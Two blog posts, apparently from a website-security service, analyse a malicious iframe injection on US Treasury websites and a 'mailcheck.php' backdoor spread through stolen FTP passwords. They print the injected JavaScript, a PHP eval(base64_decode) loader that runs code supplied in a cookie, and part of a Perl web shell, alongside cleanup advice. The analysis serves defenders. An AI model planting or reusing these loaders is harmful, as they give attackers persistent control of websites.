Treasury .gov websites hacked

It was announced by AVG that the websites: (Bureau of Engraving and Printing), and were injected with a malscript:

<SCR IPT (space added)>
           function addCookie(name, value, hours)
                 var date = new Date();
                var expires ”; expires=”+date.toGMTString();
               document.cookie = name+”=”+value+expires+”; “;

document.write(‘<iframe frameborder=”0″ onload=\’ if (!this.src){
this.src=””; this.height=0; this.width=0;} \’></iframe>’);
addCookie(“cook”, “1”, 24);
</SCR IPT (space added)>

According to this webpage: “Panda analysts speculate that hackers used a common attack technique known as SQL injection, to compromise the U.S. Treasury website. However, other experts think the incident is related to the recent mass compromise at Network Solutions, where the website is hosted. This possibility is enforced by the use of the malicious domain in both attacks.”

However, it could also be that someone with FTP access to the website had a virus. The virus steals FTP login credentials and sends them to a server which then infects the websites it has legitimate access to. I see no mention of that possibility. Being that this code was injected after the closing html tag, I doubt very seriously that it’s a SQL injection, possible, but highly unlikely.

Could it have been part of the larger compromise at the hosting provider? Possibly, although last I heard and read, they had cleaned that all up and I know that the first round targeted WordPress blogs, but later repeat attacks targeted all websites at the hosting provider.

 It could have been that these sites were untouched until now? We may never know. But I do know that Network Solutions has always responded quickly to infections and taken responsibility when the “stuff” hits the fan. I have applauded them before and I do so now as well.

 Could this be more finger pointing at someone other than who’s responsible? No, that never happens in the government – does it?

Please leave your comments below…

Thank you.


Attack of mailcheck.php and

This attack isn’t anything new, it was used on a number of Italian sites in March 2010, but we’ve been seeing more of it infecting websites recently so I thought I’d elaborate.

Quite often when scanning or cleaning infected websites, when we see the mailcheck.php file, we also see the file but that isn’t cast in stone. However, we have not seen by itself. In other words, mailcheck.php can appear by itself, but does not – at least from what we’ve seen.

The mailcheck.php files usually contains this code:

<?php eval(base64_decode(‘aWYoaXNzZXQoJF9DT09LSUVbIlBIUFNFU1NJSUQiXSkpe2V2YWwoYmFzZTY0X2RlY29kZSgkX0NPT0tJRVsiUEhQU0VTU0lJRCJdKSk7ZXhpdDt9’));
echo “checking email…”;?>



Which deobfuscates to:


The file is programmed in Perl and looks like:

use MIME::Base64 ();eval MIME::Base64::decode("JGMgPSAkRU5WeyJIVFRQX0NPT0tJRSJ9O0BjID0gc3BsaXQgLzsvLCAkYztmb3JlYWNoICRhIChA\nYyl7JGEgPX4gbS9QSFBTRVNTSUlEPSguKikvO2lmIChsZW5ndGgoJDEpID4gMCkge2V2YWwgTUlN\nRTo6QmFzZTY0OjpkZWNvZGUoJDEpO2RpZSAiIjt9fQ==");
$P = "Lf'njItkk";
$WinNT = 0;
$NTCmdSep = "&";
$UnixCmdSep = ";";
$CommandTimeoutDuration = 120;
$ShowDynamicOutput = 1;

As you can see, this code also uses the base64 decoding even though in it’s written in Perl. Same strategy, different programming language.

With the infection of mailcheck.php and/or, we’ve seen a number of .php and sometimes even .html files that have some PHP code inserted across the top of the file that looks like:

<?php ob_start(‘security_update’); function security_update($buffer){return $buffer.'<script language=”javascript”>function t()…

What’s interesting about this malscript is that it uses the ‘ob_start’ function to run it’s code. ob_start is used by many WordPress sites, software galleries and other software and plugins for a large variety of websites.

This clearly shows how clever the hackers are. They’re actually using valid functions found on many websites to run their malscripts. Also by “hiding” their malscript as something that uses the words “security_update” they hope that people will overlook their code and move on to other harmful looking code instead.

What can you do if you find this on your website?

Again, this type of attack is the result of a virus that steals the FTP passwords from a PC, sends them to as server which then modifies the files on the website and adds the mailcheck.php and or the files so they can re-infect the website after the owner has cleaned the site and changed the FTP passwords.

I recommend using WS_FTP by Ipswitch because this program does not save the stored passwords in plain text. They are encrypted which means the hackers have to do more work in order to use them. It’s not that they aren’t “hackable”, it’s just that the hackers have so many other PCs and websites that are easily hacked that right now, they probably won’t spend the time or effort in cracking the encryption.

You can also check to see if your hosting provider allows you to use SFTP instead of FTP. SFTP is encrypted traffic so a hacker’s virus can’t easily sniff the traffic and see the plain text username and password.

If you have any comments about this information or have a specific instance of a similar infection, please post your comments below.

Thank you.